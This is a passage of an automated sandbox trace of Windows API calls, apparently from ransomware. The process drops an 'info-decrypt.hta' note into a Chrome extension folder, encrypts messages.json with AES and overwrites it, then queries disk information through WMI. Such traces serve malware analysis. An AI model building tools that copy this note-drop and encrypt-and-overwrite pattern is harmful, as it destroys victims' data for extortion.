ftLastWriteTime.dwLowDateTime=0x857953d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f0d0 [0207.844] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e784 | out: lpFindFileData=0x949e784*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857953d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857953d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0207.844] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e784 | out: lpFindFileData=0x949e784*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857953d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x101, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0207.845] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e784 | out: lpFindFileData=0x949e784*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0207.845] FindClose (in: hFindFile=0xb7f0d0 | out: hFindFile=0xb7f0d0) returned 1 [0207.845] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea0c) returned 1 [0207.845] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea18) returned 1 [0207.845] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ea4c) returned 1 [0207.845] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar", nBufferLength=0x105, lpBuffer=0x949e554, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar", lpFilePart=0x0) returned 0x89 [0207.845] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\", nBufferLength=0x105, lpBuffer=0x949e528, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\", lpFilePart=0x0) returned 0x8a [0207.845] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\*", lpFindFileData=0x949e774 | out: lpFindFileData=0x949e774*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857953d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857953d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f0d0 [0207.845] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e784 | out: lpFindFileData=0x949e784*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857953d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857953d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0207.845] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e784 | out: lpFindFileData=0x949e784*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857953d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x101, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0207.846] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e784 | out: lpFindFileData=0x949e784*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857953d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x101, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0207.846] FindClose (in: hFindFile=0xb7f0d0 | out: hFindFile=0xb7f0d0) returned 1 [0207.846] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea0c) returned 1 [0207.846] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea18) returned 1 [0207.846] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json", nBufferLength=0x105, lpBuffer=0x949e4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json", lpFilePart=0x0) returned 0x97 [0207.846] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x949e4c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\info-decrypt.hta", lpFilePart=0x0) returned 0x9a [0207.846] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e928) returned 1 [0207.846] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x949e9a4 | out: lpFileInformation=0x949e9a4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0207.846] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e924) returned 1 [0207.846] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json", nBufferLength=0x105, lpBuffer=0x949e4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json", lpFilePart=0x0) returned 0x97 [0207.846] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x949e368, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\info-decrypt.hta", lpFilePart=0x0) returned 0x9a [0207.846] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e85c) returned 1 [0207.847] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x208 [0207.847] GetFileType (hFile=0x208) returned 0x1 [0207.847] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e858) returned 1 [0207.847] GetFileType (hFile=0x208) returned 0x1 [0207.847] WriteFile (in: hFile=0x208, lpBuffer=0x3607254*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x949e920, lpOverlapped=0x0 | out: lpBuffer=0x3607254*, lpNumberOfBytesWritten=0x949e920*=0x1000, lpOverlapped=0x0) returned 1 [0207.848] WriteFile (in: hFile=0x208, lpBuffer=0x3607254*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x949e8f4, lpOverlapped=0x0 | out: lpBuffer=0x3607254*, lpNumberOfBytesWritten=0x949e8f4*=0x55e, lpOverlapped=0x0) returned 1 [0207.849] CloseHandle (hObject=0x208) returned 1 [0207.849] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json", nBufferLength=0x105, lpBuffer=0x949e4c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json", lpFilePart=0x0) returned 0x97 [0207.849] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e974) returned 1 [0207.849] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json"), fInfoLevelId=0x0, lpFileInformation=0x3608270 | out: lpFileInformation=0x3608270*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857953d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x101)) returned 1 [0207.849] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e970) returned 1 [0207.849] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json", nBufferLength=0x105, lpBuffer=0x949e3b4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json", lpFilePart=0x0) returned 0x97 [0207.849] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e8a8) returned 1 [0207.849] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x208 [0207.850] GetFileType (hFile=0x208) returned 0x1 [0207.850] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e8a4) returned 1 [0207.850] GetFileType (hFile=0x208) returned 0x1 [0207.850] GetFileSize (in: hFile=0x208, lpFileSizeHigh=0x949e9b0 | out: lpFileSizeHigh=0x949e9b0*=0x0) returned 0x101 [0207.850] ReadFile (in: hFile=0x208, lpBuffer=0x36086d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x949e95c, lpOverlapped=0x0 | out: lpBuffer=0x36086d8*, lpNumberOfBytesRead=0x949e95c*=0x101, lpOverlapped=0x0) returned 1 [0207.851] CloseHandle (hObject=0x208) returned 1 [0207.851] CryptAcquireContextW (in: phProv=0x949e8fc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x949e8fc*=0xbe0b58) returned 1 [0207.852] CryptGenRandom (in: hProv=0xbe0b58, dwLen=0x10, pbBuffer=0x3609d9c | out: pbBuffer=0x3609d9c) returned 1 [0208.233] CryptImportKey (in: hProv=0xbe0b58, pbData=0x3711cb4, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x949e8cc | out: phKey=0x949e8cc*=0xb7f850) returned 1 [0208.233] CryptContextAddRef (hProv=0xbe0b58, pdwReserved=0x0, dwFlags=0x0) returned 1 [0208.233] CryptContextAddRef (hProv=0xbe0b58, pdwReserved=0x0, dwFlags=0x0) returned 1 [0208.233] CryptDuplicateKey (in: hKey=0xb7f850, pdwReserved=0x0, dwFlags=0x0, phKey=0x949e8bc | out: phKey=0x949e8bc*=0xb7fb10) returned 1 [0208.233] CryptContextAddRef (hProv=0xbe0b58, pdwReserved=0x0, dwFlags=0x0) returned 1 [0208.233] CryptSetKeyParam (hKey=0xb7fb10, dwParam=0x4, pbData=0x3711d94*=0x1, dwFlags=0x0) returned 1 [0208.233] CryptSetKeyParam (hKey=0xb7fb10, dwParam=0x1, pbData=0x3711d60, dwFlags=0x0) returned 1 [0208.233] CryptEncrypt (in: hKey=0xb7fb10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3711da4*, pdwDataLen=0x949e928*=0x110, dwBufLen=0x110 | out: pbData=0x3711da4*, pdwDataLen=0x949e928*=0x110) returned 1 [0208.233] CryptEncrypt (in: hKey=0xb7fb10, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3711ed8*, pdwDataLen=0x949e930*=0x0, dwBufLen=0x10 | out: pbData=0x3711ed8*, pdwDataLen=0x949e930*=0x10) returned 1 [0208.235] CryptDestroyKey (hKey=0xb7f850) returned 1 [0208.235] CryptReleaseContext (hProv=0xbe0b58, dwFlags=0x0) returned 1 [0208.235] CryptReleaseContext (hProv=0xbe0b58, dwFlags=0x0) returned 1 [0208.235] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json", nBufferLength=0x105, lpBuffer=0x949e3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json", lpFilePart=0x0) returned 0x97 [0208.235] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e894) returned 1 [0208.235] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x32c [0208.236] GetFileType (hFile=0x32c) returned 0x1 [0208.236] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e890) returned 1 [0208.236] GetFileType (hFile=0x32c) returned 0x1 [0208.236] WriteFile (in: hFile=0x32c, lpBuffer=0x37125a0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x949e924, lpOverlapped=0x0 | out: lpBuffer=0x37125a0*, lpNumberOfBytesWritten=0x949e924*=0x20, lpOverlapped=0x0) returned 1 [0208.237] CloseHandle (hObject=0x32c) returned 1 [0208.237] CoTaskMemAlloc (cb=0x20c) returned 0xbed438 [0208.237] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbed438 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0208.237] CoTaskMemFree (pv=0xbed438) [0208.237] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x949e388, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0208.238] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e8d0 | out: ppv=0x949e8d0*=0xb51e34) returned 0x0 [0208.238] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949e8c8 | out: pAptType=0x949e8c8*=1) returned 0x0 [0208.238] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949e8cc | out: ppvObject=0x949e8cc*=0x0) returned 0x80004002 [0208.238] IUnknown:Release (This=0xb51e34) returned 0x1 [0208.239] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e238 | out: ppv=0x949e238*=0x6027370) returned 0x0 [0208.239] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027370, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e450 | out: ppvObject=0x949e450*=0x0) returned 0x80004002 [0208.239] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027370, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e464 | out: ppvObject=0x949e464*=0x6030a90) returned 0x0 [0208.239] WbemDefPath:IUnknown:Release (This=0x6027370) returned 0x0 [0208.239] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a90, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e084 | out: ppvObject=0x949e084*=0x6030a90) returned 0x0 [0208.239] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a90, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e040 | out: ppvObject=0x949e040*=0x0) returned 0x80004002 [0208.239] WbemDefPath:IUnknown:AddRef (This=0x6030a90) returned 0x3 [0208.239] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a90, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949d99c | out: ppvObject=0x949d99c*=0x0) returned 0x80004002 [0208.240] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a90, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949d94c | out: ppvObject=0x949d94c*=0x0) returned 0x80004002 [0208.240] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a90, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949d958 | out: ppvObject=0x949d958*=0xbe22e0) returned 0x0 [0208.240] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbe22e0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949d960 | out: pCid=0x949d960*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0208.240] WbemDefPath:IUnknown:Release (This=0xbe22e0) returned 0x3 [0208.240] CoGetContextToken (in: pToken=0x949d9b8 | out: pToken=0x949d9b8) returned 0x0 [0208.240] CoGetContextToken (in: pToken=0x949ddc0 | out: pToken=0x949ddc0) returned 0x0 [0208.240] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a90, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949de50 | out: ppvObject=0x949de50*=0x0) returned 0x80004002 [0208.240] WbemDefPath:IUnknown:Release (This=0x6030a90) returned 0x2 [0208.240] WbemDefPath:IUnknown:Release (This=0x6030a90) returned 0x1 [0208.240] CoGetContextToken (in: pToken=0x949e748 | out: pToken=0x949e748) returned 0x0 [0208.240] CoGetContextToken (in: pToken=0x949e6a8 | out: pToken=0x949e6a8) returned 0x0 [0208.240] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a90, riid=0x949e778*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x949e774 | out: ppvObject=0x949e774*=0x6030a90) returned 0x0 [0208.240] WbemDefPath:IUnknown:AddRef (This=0x6030a90) returned 0x3 [0208.240] WbemDefPath:IUnknown:Release (This=0x6030a90) returned 0x2 [0208.240] WbemDefPath:IWbemPath:SetText (This=0x6030a90, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0208.240] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030a90, puCount=0x949e8fc | out: puCount=0x949e8fc*=0x0) returned 0x0 [0208.240] WbemDefPath:IWbemPath:GetText (in: This=0x6030a90, lFlags=2, puBuffLength=0x949e8f8*=0x0, pszText=0x0 | out: puBuffLength=0x949e8f8*=0x20, pszText=0x0) returned 0x0 [0208.240] WbemDefPath:IWbemPath:GetText (in: This=0x6030a90, lFlags=2, puBuffLength=0x949e8f8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949e8f8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0208.240] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030a90, uRequestedInfo=0x0, puResponse=0x949e904 | out: puResponse=0x949e904*=0xc19) returned 0x0 [0208.240] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030a90, puCount=0x949e8fc | out: puCount=0x949e8fc*=0x0) returned 0x0 [0208.240] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030a90, uRequestedInfo=0x0, puResponse=0x949e904 | out: puResponse=0x949e904*=0xc19) returned 0x0 [0208.240] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030a90, uRequestedInfo=0x0, puResponse=0x949e904 | out: puResponse=0x949e904*=0xc19) returned 0x0 [0208.240] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030a90, puCount=0x949e87c | out: puCount=0x949e87c*=0x0) returned 0x0 [0208.240] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x949e868 | out: puCount=0x949e868*=0x2) returned 0x0 [0208.240] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x949e864*=0x0, pszText=0x0 | out: puBuffLength=0x949e864*=0xf, pszText=0x0) returned 0x0 [0208.240] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x949e864*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e864*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0208.240] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e818 | out: ppv=0x949e818*=0xb51e34) returned 0x0 [0208.241] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949e810 | out: pAptType=0x949e810*=1) returned 0x0 [0208.241] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, 